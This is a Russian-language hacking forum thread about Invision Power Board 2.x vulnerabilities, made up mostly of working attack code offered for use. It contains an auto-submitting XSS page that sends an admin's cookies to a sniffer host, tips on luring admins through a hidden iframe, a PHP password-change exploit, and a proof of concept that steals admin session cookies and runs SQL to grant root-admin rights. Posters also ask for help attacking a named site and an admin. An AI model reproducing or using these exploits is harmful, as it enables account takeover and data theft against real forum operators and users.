Invision Power Board v2.1.7

[ђ Ў®зЁ© бв®«]

Форум Invision Power Board v2.1.7 тоже не обошёлся без багов в инете появилась инфа что форум страдает XSS.
Лазая по сайтам я нашёл инфу что xss можно осуществить через приватные сообжения(не фильтруется вводимый заголовок) подсунув ядовитый линк админу форума и соснифав у него куки от админки.
Вот сам скрипт который я свалял чтоб тырить куки (надо залить на хостинг).

Цитата:

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();">
<h3>Спасибо, сейчас вы будете перенаправлены</h3> <!-- Сюда можешь вставить любой текст или html код -->
<form action="http://03-06.pp.ru/forum/index.php?act=msg" method="post" name="REPLIER"">
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="entered_name" value="Nick">
<input type="hidden" name="OID" value="" />
<input type="hidden" name="act" value="Msg" />
<input type="hidden" name="CODE" value="04" />
<input type="hidden" name="MODE" value="01" />
<input type="hidden" name="preview" value="Предварительный просмотр">
<input type="hidden" name="msg_title" value='"><script>document.location.href="http://путь до снифера /sniff.php?"+document.cookie;</script>'>
</form>
</body>
</html>

Это можно внедрить на своей домашней страничке ввиде невидемого фрейма и дать линк админу ))
Скрипт был опробован и 100% рабочий. Лучьше совать не линк на скрипт а домашнюю страничку, так админы больше ведуться неожидая подвоха.

[4yB@K]

Еще не проверял

Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки изображений PDF файлов, содержащих HTML код. Если создать тему и прикрепить файл pdf а внутри него написать <script>alert()</script> то при открытие файла вылетает алерт... работает на ie
Работает только при установленном acrobat reader <=7


Лечится обновлением


Invision Power Board v2.1.7 (Debug) Remote Password Change Exploit

PHP код:

<?php 
/* 

 Debug Mode password change vulnerability 
 Affects Invision Power Borard 2.0.0 to 2.1.7 
 by Rapigator 
  
 This works if: 

 "Debug Level" is set to 3 
 or 
 Enable SQL Debug Mode is turned on 
  
 In General Configuration of the forum software. 

*/ 

// The forum's address up to and including 'index.php' 
$site = "http://localhost/forums/index.php"; 

// An existing user's login name 
$name = "admin"; 

// The new password(3-32 characters) 
$pass = "1234"; 

// You can use a proxy... 
// $proxy = "1.2.3.4:8080"; 



// ----------------------------- 
$site .= "?"; 
$suffix = ""; 
$name = urlencode($name); 
$pass = urlencode($pass); 
$curl = curl_init($site.'act=Reg&CODE=10'); 
curl_setopt($curl, CURLOPT_PROXY, $proxy); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($curl, CURLOPT_TIMEOUT, 10); 
$page = curl_exec($curl); 
curl_close($curl); 
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { 
$prefix = $regs[1]; 
$regid = $regs[2]; 
$regcode = $regs[3]; 
} else { 
$suffix = "&debug=1"; 
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix); 
curl_setopt($curl, CURLOPT_PROXY, $proxy); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($curl, CURLOPT_TIMEOUT, 10); 
$page = curl_exec($curl); 
curl_close($curl); 
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) { 
$prefix = $regs[1]; 
$regid = $regs[2]; 
$regcode = $regs[3]; 
} 
} 
if (!isset($regid) || !isset($regcode)) { 
echo "Error: Probably not vulnerable, or no forum found"; 
exit; 
} 

$curl = curl_init($site.$suffix); 
curl_setopt($curl, CURLOPT_PROXY, $proxy); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($curl, CURLOPT_POST, 1); 
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}"); 
curl_setopt($curl, CURLOPT_TIMEOUT, 10); 
$page = curl_exec($curl); 
curl_close($curl); 
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { 
change_pass($regcode,$regid,$regs[1],$regs[2]); 
} 
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,  coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) { 
change_pass($regcode,$regid,$regs[1],$regs[2]); 
} 

function change_pass($regcode,$regid,$vid,$userid) { 
global $site, $proxy, $name, $pass; 
$curl = curl_init($site.$suffix); 
curl_setopt($curl, CURLOPT_PROXY, $proxy); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($curl, CURLOPT_POST, 1); 
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}"); 
curl_setopt($curl, CURLOPT_TIMEOUT, 10); 
$page = curl_exec($curl); 
curl_close($curl); 
echo "Password Changed!"; 
exit; 
} 
?>

тут должен быть включен curl

4yB@K добавил 15.07.2007 в 20:53
Вот еще

PHP код:

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# 
#   Invision Power Board 2.2.2 Cross Site Scripting vulnerability 
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   Vendor site: http://www.invisionboard.com/ 
#   Vulnerability found by Iron (ironwarez.info) 
# 
#   Greets to all **** Security Group members     
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   The vulnerability: 
#   Open up any php file in /jscripts/folder_rte_files 
#    See: 

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?> 
     
# 
#   $_REQUEST['editorid'] isn't sanitized in any way, so allows 
#   other uses to execute their own code. 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#   PoC (Log cookies & run SQL query) 
# 
#   Requirements: server supporting PHP, user account on 
#   target forum, database prefix needs to be known. 
# 
#   Create a file called name.php on your webserver and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<?php 
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash 
$prefix = "ibf_"; #Database prefix, default: ibf_ 
$member = 22; #Member id to promote 
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin 

$ip = $_SERVER['REMOTE_ADDR']; 
$referer = $_SERVER['HTTP_REFERER']; 
$agent = $_SERVER['HTTP_USER_AGENT']; 

$data = $_GET['c']; 
$time = date("Y-m-d G:i:s A"); 
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n"; 

$file = fopen('log.txt' , 'a'); 
fwrite($file,$text); 
fclose($file); 
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff)) 
{ 
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+ 
'.$prefix.'members+SET 
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.  $member.'%27&st="></>'; 
} 
?> 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#    Also create a file in the same directory named "log.txt" and chmod it 777 
# 
#    Now, create a file called script.js on your webserver, put this code in it: 
# 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie; 

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# 
#    And, last but not least, create a file that combines those two;) 
#    Name it blah.html and put this code in it: 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></ 
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

Может кто хочет попробывать взламать форум этой же версии на сайте www.mama.lt . Буду очень благодарен! :) Нужно их уничтожить.

<input type="hidden" name="msg_title" value='"><script>document.location.href="http://путь до снифера /sniff.php?"+document.cookie;</script>'>
Что это строчка значет, и что такое снифер и с чем его едят?

[0o.o0]

Почитай здесь
http://kanick.ru/sniffer/

[4yB@K]

Цитата:

Сообщение от Aftalick

<input type="hidden" name="msg_title" value='"><script>document.location.href="http://путь до снифера /sniff.php?"+document.cookie;</script>'>
Что это строчка значет, и что такое снифер и с чем его едят?

Сниффер - это такая штука, которая записывает произвольнае данные, переданные браузером.
На этом сайте сниффер не работает, посмотри на моем.

Ок, спасибо я только учусь, везде не трудно преуспеть....
Можно услышать объяснение строки:
<form action="http://03-06.pp.ru/forum/index.php?act=msg" method="post" name="REPLIER"">

[4yB@K]

Хм, помоему тут введенные данные отправляются скрипту
http://03-06.pp.ru/forum/index.php?act=msg
методом POST

Хм, глянь страничку пож, посмотри и посоветуй если можно.... как оформить код на странице, и какая команда по замене 03-06.pp.ru/forum/index.php?act=msg
Хочузлобно подшутить над одним админишкой :)

[4yB@K]

Это хостинг Юкоз, так-что ничего тут не получится